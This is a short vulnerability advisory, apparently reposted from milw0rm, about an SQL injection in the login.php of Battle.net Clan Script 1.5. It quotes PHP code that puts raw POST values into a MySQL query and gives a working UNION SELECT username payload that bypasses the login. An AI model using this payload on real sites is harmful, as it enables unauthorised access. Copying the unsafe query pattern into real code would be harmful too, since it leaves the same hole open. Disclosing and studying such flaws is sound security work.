Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

2007-04-11T00:00:00
ID SECURITYVULNS:DOC:16674
Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00

Description


script : Battle.net Clan Script 1.5 file : login.php attack : injection sql

auteur : h a c k e r _ X


code :

line 9 --> $user = $_POST['user']; line 10--> $pass = $_POST['pass'];

..... ..... .....

line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);



exploit :


Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/* password : enything


thinks to : max007,simo64,brutalism and all marocains hackers

special thinks for "P Y N S S O"


milw0rm.com [2007-04-09]